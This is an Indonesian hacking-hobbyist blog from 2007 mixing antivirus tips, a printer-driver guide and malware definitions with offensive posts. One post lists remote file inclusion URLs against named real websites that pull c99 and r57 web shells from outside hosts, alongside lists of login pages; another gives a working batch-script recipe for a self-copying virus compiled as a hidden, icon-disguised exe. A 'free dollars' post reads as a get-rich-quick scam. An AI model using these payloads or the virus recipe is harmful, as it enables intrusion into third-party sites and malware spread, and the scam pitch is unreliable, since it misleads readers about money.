Tips aman dari virus tanpa anti virus
setelah saya mempunyai komputer,watu pertama kali sering di masuki oleh virus, lalu basmi pake antivirus yang sangat menguras memori, oke lah yang make memori 1 gb atau lebih, gimana kalau komputer anda memakai memory 256mb atau 128mb, saya jamin bikin komputer anda lambat.Lalu saya mencari jalan keluarnya dengan jalan cara mempelajari algoritma virus tersebut dan bagai mana saya terserang oleh virus tersebut.setelah saya kunjungi situs hacking yang ada di dunia dan beberapa experimen yang saya lakukan di rumah , maka saya dapat menemukan file virus, berikut ini adalah beberapa cara aman dari virus tanpa antivirus :
- Icon Virus atau Worm
Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan
sesuai. Beberapa virus meniru icon msword dan icon file-file gambar
untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus
w32/kumis.A dan Brontok misalnya. Sebaiknya komputer anda harus akifkan show hidden folder tool > Folder Options > View > Cetang tanda " Show hidden Files and folders ", dan hilangkan tanda cetang di " Hide extensiona for known file types " dan " Hide protected operating system files (Recommended) ". Dari pengalaman saya dengan virus, bahwa icon virus selalu mengelabui kita dengan icon umum yang kita gunakan. Jadi kita bisa mengubah icon tersebut, untuk icon folder bisa menggunakan program " icolorfolder.exe" yang dapat anda download di http://icolorfolder.sourceforge.net/download_icolorfolder_page.htm . kenapa folder harus kita ngati warnanya, karena sewaktu pembuat virus akan menggunakan icon folder sebagai icon virus, disini setiap unser selalu terkecoh, jadi kalau icon folder dikasih warna lain ( kayak warna hijau, merah ) makan virus tersebut akan terkecoh, karena hanya iconnya saja yang berwarna kuning. Jadi kalau komputer anda ada folder warna kuning, sebaiknya hapus saja.
Setelah icon folder kita rubah selanjut icon lain yang harus kita rubah, seperti : Microsoft Word, Acrobat Raider ( PDF ), icon tersebut bisa anda rubah dengan menggunakan IconChanger bisa anda download di http://www.shelllabs.com . setelah semua icon kita rubah maka sudah 70% anda akan mengetahu yang mana virus atau tidak.
- Kompres file
saat anda mau mencopy file di komputer lain sebaiknya anda comppres file tersebut dingan untility commpres. karena virus tidak akan menyebar di dalam kompres tersebut.
- hati-hati buka media penyimpanan sementara
Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia
masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan
langsung membuka disket atau flashdisk dengan menggunakan Windows explorer!! Masuklah ke
A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya
beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file
folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya.
Why?? Karena file ini akan otomatis tereksekusi saat anda membuka suatu folder
atau drive (dikendalikan oleh file desktop.ini). Dan yang perlu anda ingat adalah, sebelum membuka file "APAPUN" dari
media-media penyimpanan diatas, lihat dulu properties filenya (klik-kanan
pada file kemudian pilih properties) perhatikan apakah File Type nya sama
dengan file yang anda maksudkan dan sesuai dengan logo icon yang dipakai.
Biasanya worm akan memakai ekstensi *.exe (aplication) dan *.scr (scren
saver) dengan menggunakan icon yang menjebak. Icon yang sering disunakan
ialah icon-icon MsOffice (msword, excel, Msaccess, MsPowerPoint), notepad,
dan icon folder.
Ketika anda menerima CD dari temanmu atau orang lain yang tidak anda ketahui
secara pasti isinya, tekan tombol SHIFT sambil memasukkan CD kedalam CD Room
drive. Klik-kanan tombol start (sambil tetap menekan tombol shift) kemudian
pilih Explore. Jendela Windows Explorer akan terbuka lalu bukalah lokasi
CD yang ingin anda buka. Setelah isi CD ditampilkan, barulah anda boleh
melepas tombol SHIFT. Hal ini akan mematikan fungsi Autorun sebagai antisipasi
bila temanmu atau orang lain membuat CD jebakan yang memanfaatkan fungsi
Autorun.
- Waspadai html, htm, php, asp dll..
Sebelum anda membuka file-file tersebut yang andau dapat dari Internet,
terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad.
Setelah dirasa aman dari script asing, barulah buka dengan browser.
- Internet
Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet
Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan
browser lain yang lebih handal misalnya Mozilla Firefox.
Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet
Beberapa screensaver juga sengaja dipasangi spyware oleh si pembuatnya.
Spyware adalah software mata-mata yang bisa mengirimkan laporan kegiatan
komputer satu (komputer korban) ke komputer lain (pemasang spyware).
Gunakan saja pembasmi spyware yang sudah banyak beredar di Internet.
Waspadai juga program-program crack karena kebanyakan aplikasi tersebut
disisipi trojan oleh pembuatnya.
Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata)
kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan
mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga
"pengen" browsing ke situs-situs "ahli Neraka" tersebut, installah
DeepFreeze terlebih dahulu dan aktifkan Frozen mode.
Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri
betapa lemahnya MS OUTLOOK. GunakangudoraMail.
- Task Manager, MsCONFIG, StartUp, Registry
Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihat-
lah aplikasi apa saja yang sedang berjalan, siapa tau ada "utusan"
Virus disana. Jika ada aplikas asing, lansung ajah EndTask.
Periksa juga MsConfig (start --> Run ketik msconfig) pada tab startup.
Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi
yang asing, segera hilangkan centang di kotak sebelahnya lalu masuklah
ke registry (start --> Run ketik regedit) dan hapus valuenya.
Direktory startup (start-programs-startup) juga harus sering-sering
diperiksa karena semua file yang ada di direktory ini akan otomatis
dijalankan saat windows startup. Jika ada file asing di directory ini,
segera hapus!!
- Trust NOBODY!!
Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat
dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut
menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau
alasan lainnya.
Bagaimana langkah di atas merepotkan ngak. Jadi kalau ada file asing sebaiknya hapus saja. Dan kalau ngak mau terserang virus maka pake aja Linux.atau instal aja komputer anda dengan antivirus terbaru dan sangat menguras memori.
Sekian dulu ya trims semua.
referensi : Pengamatan terhadap berbagai aksi virus dan cara pembasmiannya di http://www.vaksin.com
Thank all:
http://www.spyrozone.tk , http://www.jogjafree.net , http://www.jasakom.com
"" Atasilah satu kesulitan maak anda akan terhindar dari ratusan kesilitan yang lain ""
by : ( ^XmoenseN^ )
Jumat, 14 September 2007
Tips Aman dari Virus
Diposting oleh
H4nk
di
03.21
0
komentar
Label: Virus
Kamis, 06 September 2007
Daftar Shell
Ini adalah Beberapa shell yang dapt anda gunakan :
http://www.yvescarbonne.com/admin/index.php3?page=http://oon.web.id/oon?
http://www.findcreditcards.net/index.php?page=http://my-underworld.net/r57shell.txt?
http://www.the-kabal.com/raid/rss.php?phpraid_dir=http://geocities.com/binushacker/inject.txt?
http://www.mpx-easystar.de/components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://www.k1n9k0ng.biz/Shell/c99Shell.txt?
http://ipsglass.com/gallery-images/db.php
http://entornomedico.net/tanatologia/pnTemp/pnRender_cache/.bht/baliembot.php
http://www.al-basair.com/BHT/
http://www.hyndlandbooks.com/pictures.php
http://205.209.102.170/images/pictures.php
http://www.al-basair.com/Articles/ummi.php
http://lnx.dgclub.it/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=
http://www.scuolaorafi.it/corsi/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
http://www.dstb.de/classes/adodbt/sql.php?classes_dir=http://freewebs.com/pacenoge/oh.txt?
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=
http://www.terapeldigitaal.nl/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
http://michael.ventunotech.com//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://modus.mortality.net/files/list.txt?
http://www.thenie.com//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://modus.mortality.net/files/list.txt?
http://www.cyber-comp.net/web/include/common.php?commonIncludePath=http://www.geocities.com/cybr_hckr/inject.txt?
http://intervalores.com/gallery.php
http://www.bustleton.net/top_site/sources/gallery.php
http://www.cusolaw.com/oneadmin/faqsupport/gallery.php
http://torneoindoor.it/guestbook/gallery.php
http://www.vnweb.de/news/newsgrafiken/gallery.php
http://www.leiches-gruft.de/pass/gallery.php
http://www.terapeldigitaal.nl/modules/PNphpBB2/includes/gallery.php
http://www.stylistonline.com/estore/images/items/big/gallery.php
http://www.bustleton.net/top_site/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.little-kids.info/xpl/cmd.do?
http://www.scenariolinks.com/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.little-kids.info/xpl/cmd.do?
http://www.advancedconcepts.info/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://geocities.com/srootscan/php.txt?cmd
http://www.biberstein.info/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://geocities.com/srootscan/php.txt?cmd
http://www.bustleton.net/top_site/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.little-kids.info/xpl/cmd.do?
http://www.scenariolinks.com/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.little-kids.info/xpl/cmd.do?
http://www.advancedconcepts.info/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://geocities.com/srootscan/php.txt?cmd
http://www.biberstein.info/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://geocities.com/srootscan/php.txt?cmd
http://www.the-website-designer-demos.com/wedding/admin/index.php?_config[site_path]=
http://the-website-designer-demos.com/entertainer/admin/index.php?_config[site_path]=
http://greatphotosaver.com/admin/index.php?_config[site_path]=
http://search2entertain.com/admin/index.php?_config[site_path]=
http://humansoft.qatar.cmu.edu/websvm/login.asp?ccode=en_US&codepage=1252
http://apps.citrix.com/CDN/Login.asp?dest=/cdn/Default.asp
https://www.fes.org/resume/login.asp?whichPage=firstPage
http://www.stri.co.uk/login.asp?SID=&CSID=3
http://www.eflorida.com/lock/login.asp?level1=25&level2=123®ion=sw
http://www.psychiatrist.com/login/login.asp?getpassword=no&email=
http://www.communityofminds.com/LogIn.asp?NextPage=registration.asp?EventID=86
http://www.touro.edu/library/commerdb/login.asp?p=1&db=CSR
http://www.touro.edu/library/commerdb/login.asp?p=1&db=brc
http://www.protectyourmove.gov/compass/login.asp
http://www.lbichat.com/games/LogIn.asp?frompage=%2Fgames%2Fdefault.asp
http://www.durexindustries.com/download/login.asp?download_file_id=34
http://www.collages.net/ConsumerSite/GuestLogin.aspx?username=Stephanie%20and%20Markus&password=10292
http://www.iconics.com/login.asp
https://www2.potatonews.com/login/login.asp?ret_url=/trends.asp
http://lincolninst.edu/login/login.asp?Submit=Login&redirect_url=
http://store.acornmedia.net/login.asp?misc=9:57:01%20AM¤t=Join.asp
http://www.proxygen.com/32/login.asp?aff_id=0
http://www.wynnsusa.com/login.asp?LoginType=A&REDIR=/loginsuccess.asp
http://www.topdogtennis.com/tournamentsforfun/login.asp?program=td
http://www.flexwatch.com/Seyeon_eng/member/login.asp
http://ipsnews.net/login.asp?redir=news.asp?idnews=35787
http://www.gowebstore.net/store/login.asp?misc=5:36:09%20PM¤t=cart.asp
http://fm-web-prod.plantops.brown.edu/vm//Login.asp?Page=vm.asp
http://www.tulsaredcross.org/login.asp?ns=&id=&oTp=general.asp
http://www.nya.org.uk/Templates/System/Login.asp?NodeID=89258
http://www.lauralaaman.com/login.asp
http://www.helmshopsupplies.com/login.asp?session=81010C73F4694F5CAD9B99F5E119F82A&d=&c=AB63DHSS29XMG7&s=
http://www.cme-today.com/Users/Login.asp?CourseID=AB0425&ParentID=
http://www.turfgrassbooks.com/login.asp?SID=&CSID=29
http://forums.delphi32.com/login.asp?sk=FC5BC87464E693080D2B99C0F400E2
http://www.aquamedicine.no/login.asp?meny=34
http://www.bifm.org.uk/Login/login.asp?altlog=1
http://www.gazettes-online.co.uk/login.asp?webType=0
http://www.pigchamp.com/login.asp?c=1
http://www.clayalliance.org/calendar/login.asp
http://stri.co.uk/login.asp?SID=&CSID=12
http://www.ncck.org/admin/login.asp?check=false
Diposting oleh
H4nk
di
08.08
0
komentar
Label: Hacking
Senin, 03 September 2007
Install Canon Pixma IP 1200 lewat CUPS
Install Canon Pixma IP 1200 lewat CUPS
Download dulu driver P2200_Linux_260.tar.gz disini
Abis itu unrar deh itu driver
Default drivernya emang .rpm tapi bisa kok diubah ke format lain, contohnya mau diubah ke .tgz (rpm2tgz cnijfilter-common-2.60-1.i386.rpm) ubah semua drivernya
Terus install aja drivernya
Setelah diinstall drivernya restart CUPS, printahnya cd /etc/rc.d
./rc.cups restart
Udah selesai tinggal konfigurasiin CUPS nya
Diposting oleh
H4nk
di
09.05
0
komentar
Label: Linux
Jumat, 24 Agustus 2007
DOlar Gratis
Dolar Gratis
itu hak Anda, Tapi ini buktinya
TANPA RESIKO
Bukan MLM, MoneyGame, Arisan,
Paid Email, ataupun Autosurf
Maukah Anda mengetahui rahasia mendapatkan US$ 50 dalam waktu sehari atau US$ 2.000 dalam waktu 1 bulan hanya dengan bekerja 5 menit sehari tanpa modal sama sekali. Program ini diberikan GRATIS.
Program ini BUKAN MLM, BUKAN MONEY GAMES, BUKAN ARISAN BERANTAI, BUKAN PAID EMAIL, BUKAN AUTOSURF.
Kami akan mengenalkan program baru. Program ini adalah murni usaha Anda. Dimana program ini tidak akan menguras kantong Anda sepeserpun, namun bisa menghasilkan hingga US$ 50 dalam 1 hari. Anda tidak percaya? Baca dulu penjelasan saya ini.
Apa yang Anda cari selama ini sudah ditemukan? Mendapatkan penghasilan tambahan dalam kurs US$, tanpa perlu memerlukan modal uang sama sekali. Usaha ini hanya perlu dijalankan dengan cara yang amat sangat mudah. Hanya memerlukan koneksi internet dari mana saja, dan hanya akan menghabiskan 5 menit saja setiap harinya. Tanpa perlu mengganggu pekerjaan rutin Anda, hanya sebagai pekerjaan sambilan saja. Dengan begitu, Anda yang akan menentukan nasib Anda sendiri. Kesempatan ini hanya akan datang sekali seumur hidup Anda. Apakah Anda akan mengambil peluang ini atau tidak, itu semua terserah Anda.
Clik Link DI bawah INi :

Diposting oleh
H4nk
di
08.46
0
komentar
Label: Bisnis
Kamis, 09 Agustus 2007
Bikin Virus dengan perintah CMD
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:
1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer
quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).
Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.
Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .
Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.
Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.
Contoh: perintah cmd yang sudah kita buat
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip
Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip
Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.
Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “
Terima Kasih kepada tomPLIX see
By ^XmoenseN^
Diposting oleh
H4nk
di
08.18
0
komentar
Label: Virus
Cara Mengidentifikasi Serangan Hacker
Saya yakin temen temen udah pada tau tentang hal ini, tapi ini cuma sekedar mengingatkan kembali memori kita dulu menangani security dengan cara manual, jangan menyalah gunakan artikel ini dan saya tidak bertanggung jawab atas penyalah gunaan artikel ini
Sumber : www dot Hackersbook dot com
Semoga bermanfaat
Identifying attackers – “Pants down"
You certainly experience people trying to send you Trojans or viruses or attacking you with unnecessary mails. Your firewall will caution you in
such cases and reveal the sender’s IP address in the mail header.
The IP address comes in handy when trying to identify the origin of the
attack. We want to illustrate what steps to take in order to get as much
information as possible.
PING
The IP address gives the attacker’s Internet address. The numerical
address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain
Name Service (DNS) protocol reveals the matching domain name. PING
stands for “Packet Internet Groper” and is delivered with practically every Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have
information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names. The following passage may be of help in such
cases.
Traceroute – Where is the attack from?
Traceroute is also carried out in the MS DOS shell, and connects your
PC to another one that is in the Internet or to a server. In precise terms, Traceroute traces the route of data packages that have reached you from a particular location in the net and vice versa. Internet comprises of several servers and routers that function as stations that convey your data packages further.
Traceroute is known as “tracert” in Windows.
Tracert 123.123.12.1
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.
After identifying a provider in this manner (e.g. provider.com), you can
obtain more information on this provider at http://www.netsol.com/cgibin/whois/whois .
Foreign domain names can searched for under the WHOIS section of
that country. You will find these at http://ww.nic. +national top-leveldomains.
e.g. http://www.nic.at for Austria or http://www.nic.ch for
Switzerland or http://www.nic.de for Germany.
Geographical analysis with NeoTrace
Finally, we would like to introduce another tool, “NeoTrace”, which even
gives a graphical display of TRACEROUTE analysis and the connection
on a map. A free trial version is available at http://www.neotrace.com.
After downloading, you should install while still online to enable Neotrace
display the geographical details.
Enter your country and the next city to where you are.
After installing, you can enter the IP address you are targeting in the
area marked “Target”, then click “Go”.
terims Kepada dokter_cinta
By ^Xmoensen^
Diposting oleh
H4nk
di
08.15
0
komentar
Label: Hacker
Apa ?? itu Virus
Definisi
Kode jahat/perusak (malicious codes atau disingkat malcodes) didefinisikan sebagai semua macam program, makro atau script yang dapat diesekusi dan dibuat dengan tujuan untuk merusak sistem komputer. Oleh karena itu bug yang dibuat secara tidak sengaja oleh programer, tidak termasuk dalam kategori ini. Tetapi untuk bug yang benar-benar mengganggu, banyak orang mengkategorikannya sebagai malcode.
Dahulu digunakan istilah "Malware (= Malicious Software)" ditujukan untuk malcode. Tetapi istilah ini terlalu lemah dan sempit, sehingga e-mail palsu/bohong yang notabene bukan software tidak dapat dimasukkan dalam golongan ini. Oleh karena itu digunakan istilah malcode, bukan malware.
Klasifikasi
Kode perusak dapat digolongkan dalam 3 macam golongan: virus, worm dan Trojan Horses, serta beberapa program yang memiliki bug.
Virus
Virus memiliki kemampuan jahat untuk mereproduksi diri mereka sendiri dan terdiri dari kumpulan kode yang dapat memodifikasi target kode yang sedang berjalan, atau dapat pula memodifikasi struktur internal target kode, sehingga target kode sebelum berjalan dipaksa menjalankan virus.
Virus sering menampilkan pesan yang tidak disukai, merusak tampilan display, menghapus memory C-MOS, merusak informasi dalam hard disk dll. Efek yang ditimbulkan virus mengalami perkembangan yang cukup serius akhir-akhir ini.
Contoh virus: Brain, Ohe half, Die hard, XM/Laroux, Win95/CIH
Virus masih dapat dibagi lagi dalam beberapa kategori:
1.Boot Virus: Jika komputer dinyalakan, sebuah inisial program di boot sector akan dijalankan. Virus yang berada di boot sector disebut boot virus.
2.File Virus: File virus adalah virus yang menginfeksi executable program. Dilaporkan bahwa hampir 80% virus adalah file virus.
3.Multipartite Virus: Virus yang menginfeksi baik boot sector dan file.
4.Macro Virus: Belakangan diketemukan. Targetnya bukan executable program, tetapi file dokument seperti Microsoft Excel atau Word. Ia akan memulai menginfeksi bila program aplikasi membaca dokumen yang berisi macro.
Worm
Worm ditujukan kepada program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya ngendon di memory.
Worm pada awalnya diketemukan di large computer (1970-an), dan akhir- akhir ini saja diketemukan di komputer kecil seperti PC. Terutama sejak 1999, dimana work banyak beredar melalui media email.
Contoh worm: I-Worm/Happy99(Ska), I-Worm/ExploreZIP, I-Worm/PrettyPark, I-Worm/MyPics
Trojan Horse
Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya, mereka dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri ber"lagak" sebagai utility program.
Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys(Korean)
Trojan Horse masih dapat dibagi lagi menjadi:
1.
DOS Trojan Horse: Trojan Horse yang berjalan di DOS. Ia mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.
2.
Windows Trojan Horse: Dijalankan di system Microsoft Windows. Jumlah Windows Trojan Horse meningkat sejak 1998 dan digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet.
Trend Malcode di Jepang tahun 1999
Virus tradisional: 6%
Windows Virus: 8%
Worm: 31% (tahun 1998, hampir 0%)
Macro Virus: 55%
Referensi
Kyu-beom Hwang, Kwangjo Kim, Joonsang Beak, Charles Ahn, "Trend of Malicious Codes and Their Countermeasures", SCIS2000, Okinawa, Japan, January 26-28, 2000.
saya kutip dar http://www.ilmukomputer.com
By ^XmoenseN^
Diposting oleh
H4nk
di
08.13
0
komentar
Label: Virus



